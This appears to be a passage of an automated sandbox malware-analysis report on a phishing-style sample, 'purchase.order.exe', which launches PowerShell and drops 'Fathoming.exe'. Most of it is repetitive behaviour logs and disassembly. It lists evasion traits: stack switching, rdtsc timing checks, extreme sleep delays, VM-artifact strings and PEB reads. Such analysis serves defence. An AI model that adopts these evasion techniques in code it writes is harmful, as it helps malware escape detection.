      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeAPI/Special instruction interceptor: Address: 1EEB6E3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E rdtsc 8_2_21B2096E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5484Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4204Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeAPI coverage: 0.2 %
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1452Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe TID: 4688Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004FE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Fathoming.exe, 00000008.00000002.2990340347.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2948566344.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2948126514.0000000006078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VtModule.psm1MSFT_NetEventVmNetworkAdatper.format.ps1xml
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fule.cmdletDeMSFT_NetEventVmNetworkAdatper.cdxml
      Source: C:\Users\user\Desktop\purchase.order.exeAPI call chain: ExitProcess graph end nodegraph_0-3678
      Source: C:\Users\user\Desktop\purchase.order.exeAPI call chain: ExitProcess graph end nodegraph_0-3686
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E rdtsc 8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22B60 NtClose,LdrInitializeThunk,8_2_21B22B60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6019F mov eax, dword ptr fs:[00000030h]8_2_21B6019F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9C188 mov eax, dword ptr fs:[00000030h]8_2_21B9C188
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9C188 mov eax, dword ptr fs:[00000030h]8_2_21B9C188
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B20185 mov eax, dword ptr fs:[00000030h]8_2_21B20185
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B84180 mov eax, dword ptr fs:[00000030h]8_2_21B84180
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B84180 mov eax, dword ptr fs:[00000030h]8_2_21B84180
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA197 mov eax, dword ptr fs:[00000030h]8_2_21ADA197
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA197 mov eax, dword ptr fs:[00000030h]8_2_21ADA197
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA197 mov eax, dword ptr fs:[00000030h]8_2_21ADA197
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B101F8 mov eax, dword ptr fs:[00000030h]8_2_21B101F8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB61E5 mov eax, dword ptr fs:[00000030h]8_2_21BB61E5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov eax, dword ptr fs:[00000030h]8_2_21B5E1D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov eax, dword ptr fs:[00000030h]8_2_21B5E1D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov ecx, dword ptr fs:[00000030h]8_2_21B5E1D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov eax, dword ptr fs:[00000030h]8_2_21B5E1D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E1D0 mov eax, dword ptr fs:[00000030h]8_2_21B5E1D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA61C3 mov eax, dword ptr fs:[00000030h]8_2_21BA61C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA61C3 mov eax, dword ptr fs:[00000030h]8_2_21BA61C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B10124 mov eax, dword ptr fs:[00000030h]8_2_21B10124
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8A118 mov ecx, dword ptr fs:[00000030h]8_2_21B8A118
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8A118 mov eax, dword ptr fs:[00000030h]8_2_21B8A118
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8A118 mov eax, dword ptr fs:[00000030h]8_2_21B8A118
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8A118 mov eax, dword ptr fs:[00000030h]8_2_21B8A118
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA0115 mov eax, dword ptr fs:[00000030h]8_2_21BA0115
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov ecx, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov ecx, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov ecx, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov eax, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8E10E mov ecx, dword ptr fs:[00000030h]8_2_21B8E10E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4164 mov eax, dword ptr fs:[00000030h]8_2_21BB4164
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4164 mov eax, dword ptr fs:[00000030h]8_2_21BB4164
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B78158 mov eax, dword ptr fs:[00000030h]8_2_21B78158
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B74144 mov eax, dword ptr fs:[00000030h]8_2_21B74144
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B74144 mov eax, dword ptr fs:[00000030h]8_2_21B74144
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B74144 mov ecx, dword ptr fs:[00000030h]8_2_21B74144
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B74144 mov eax, dword ptr fs:[00000030h]8_2_21B74144
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B74144 mov eax, dword ptr fs:[00000030h]8_2_21B74144
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE6154 mov eax, dword ptr fs:[00000030h]8_2_21AE6154
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE6154 mov eax, dword ptr fs:[00000030h]8_2_21AE6154
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC156 mov eax, dword ptr fs:[00000030h]8_2_21ADC156
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA60B8 mov eax, dword ptr fs:[00000030h]8_2_21BA60B8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA60B8 mov ecx, dword ptr fs:[00000030h]8_2_21BA60B8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD80A0 mov eax, dword ptr fs:[00000030h]8_2_21AD80A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B780A8 mov eax, dword ptr fs:[00000030h]8_2_21B780A8
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE208A mov eax, dword ptr fs:[00000030h]8_2_21AE208A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B220F0 mov ecx, dword ptr fs:[00000030h]8_2_21B220F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE80E9 mov eax, dword ptr fs:[00000030h]8_2_21AE80E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA0E3 mov ecx, dword ptr fs:[00000030h]8_2_21ADA0E3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B660E0 mov eax, dword ptr fs:[00000030h]8_2_21B660E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC0F0 mov eax, dword ptr fs:[00000030h]8_2_21ADC0F0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B620DE mov eax, dword ptr fs:[00000030h]8_2_21B620DE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76030 mov eax, dword ptr fs:[00000030h]8_2_21B76030
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADA020 mov eax, dword ptr fs:[00000030h]8_2_21ADA020
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADC020 mov eax, dword ptr fs:[00000030h]8_2_21ADC020
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B64000 mov ecx, dword ptr fs:[00000030h]8_2_21B64000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B82000 mov eax, dword ptr fs:[00000030h]8_2_21B82000
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE016 mov eax, dword ptr fs:[00000030h]8_2_21AFE016
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE016 mov eax, dword ptr fs:[00000030h]8_2_21AFE016
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE016 mov eax, dword ptr fs:[00000030h]8_2_21AFE016
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE016 mov eax, dword ptr fs:[00000030h]8_2_21AFE016
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0C073 mov eax, dword ptr fs:[00000030h]8_2_21B0C073
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B66050 mov eax, dword ptr fs:[00000030h]8_2_21B66050
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE2050 mov eax, dword ptr fs:[00000030h]8_2_21AE2050
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE388 mov eax, dword ptr fs:[00000030h]8_2_21ADE388
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE388 mov eax, dword ptr fs:[00000030h]8_2_21ADE388
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADE388 mov eax, dword ptr fs:[00000030h]8_2_21ADE388
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8397 mov eax, dword ptr fs:[00000030h]8_2_21AD8397
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8397 mov eax, dword ptr fs:[00000030h]8_2_21AD8397
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8397 mov eax, dword ptr fs:[00000030h]8_2_21AD8397
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0438F mov eax, dword ptr fs:[00000030h]8_2_21B0438F
